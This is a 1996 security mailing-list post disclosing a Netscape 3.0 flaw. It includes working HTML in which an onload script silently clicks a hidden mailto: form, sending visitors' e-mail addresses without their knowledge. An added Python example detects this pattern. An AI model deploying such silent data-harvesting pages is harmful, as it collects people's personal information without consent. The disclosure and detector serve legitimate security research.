[3921] in WWW Security List Archive
One more reason to upgrade your navigator
daemon@ATHENA.MIT.EDU (htorgema@novice.uwaterloo.ca)
Sun Dec 29 22:50:23 1996
From: htorgema@novice.uwaterloo.ca
Date: Sun, 29 Dec 1996 20:36:10 -0500 (EST)
To: www-security@ns2.rutgers.edu
In-Reply-To: <01BBF3F2.9ED9F520@silicon.geocel.com>
Errors-To: owner-www-security@ns2.rutgers.edu
Warning: On-topic message!
With Netscape Navigator 3.0, it is possible to grab
automatically and silently the e-mail addresses of each
client coming to a page.
It was already known that when a form is submitted with
method="get", enctype="text/plain" and action="mailto:..",
no warning dialog box is shown.
The next step is to submit the form automatically.
But Netscape put some security restrictions in place:
JavaScript usually allows a form to be submitted automatically
with the submit() method, but this doesn't work when the
action contains a mailto: URL.
However, you can emulate a mouse click on the submit button
with another method: click()...
Here's working HTML code:
<HTML>
<HEAD>
<TITLE> How to grab an e-mail address
</TITLE>
</HEAD>
<BODY onload= "document.forms[0].elements[1].click()">
<FORM method= get
enctype="text/plain"
action= "mailto:henri.torgemane@etu.utc.fr?subject=Big bug">
<INPUT type= "hidden"
name= "It's time to upgrade to "
value= "> Netscape 3.01">
<INPUT type= submit
value= "">
</FORM>
</BODY>
</HTML>
The only unusual line is the <BODY> line:
the onload parameter tells the navigator to execute the JavaScript
command that follows.
document.forms[0].elements[1].click()
tells the browser to emulate a click on the second element of the first
form of the current document.
(the first element is a hidden tag, the second is the submit button)
I tested this only on Netscape 3.0 for AIX.
It's very likely to work on any other version of Netscape 3.0.
I don't know how it works with Netscape 3.01...
Henri.
PS: You should change the mailto: URL to your own address.
---------------
Henri Torgemane http://www.undergrad.math.uwaterloo.ca/~htorgema/
Never let your sense of morals prevent you from doing what is right.
-- Salvor Hardin, "Foundation"
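
Added example, not part of the original message: a filter-side check for the pattern described above, flagging a page only when a mailto: form and a scripted click()/submit() appear together. It goes beyond the post by also looking at inline <script> bodies and any on* handler, not just <BODY onload>. The class and function names, the regex and the sample page (with a placeholder address) are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
# Script calls that fire a form control without the user touching it.
AUTO_TRIGGER = re.compile(r"\.(click|submit)\s*\(", re.I)
# Constructed sample page (address is a placeholder, not from the post).
SAMPLE = """<html><body onload="document.forms[0].elements[1].click()">
<form method=get enctype="text/plain" action="mailto:collector@example.invalid">
<input type=hidden name="note" value="x"><input type=submit value="">
</form></body></html>"""

class MailtoFormAuditor(HTMLParser):
    """Records mailto: forms and handlers/scripts that script a click or submit."""
    def __init__(self):
        super().__init__()
        self.mailto_forms = []  # one dict per form: action, hidden-field count
        self.triggers = []      # (tag, attribute, source text)
        self._form = None       # mailto form currently open, if any
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "").strip() for k, v in attrs}
        if tag == "form" and attrs.get("action", "").lower().startswith("mailto:"):
            self._form = {"action": attrs["action"], "hidden": 0}
            self.mailto_forms.append(self._form)
        elif tag == "input" and self._form and attrs.get("type", "").lower() == "hidden":
            self._form["hidden"] += 1
        elif tag == "script":
            self._in_script = True
        for name, value in attrs.items():  # onload, onclick, onfocus, ...
            if name.startswith("on") and AUTO_TRIGGER.search(value):
                self.triggers.append((tag, name, value))

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and AUTO_TRIGGER.search(data):
            self.triggers.append(("script", "inline", data.strip()))

def audit(html):
    """Flag a page only when a mailto: form and a scripted trigger co-occur."""
    p = MailtoFormAuditor()
    p.feed(html)
    p.close()
    return {"forms": p.mailto_forms, "triggers": p.triggers,
            "suspicious": bool(p.mailto_forms and p.triggers)}
```

A mailto: form on its own, or a scripted submit of an ordinary form, is not flagged; audit(SAMPLE) reports the combination.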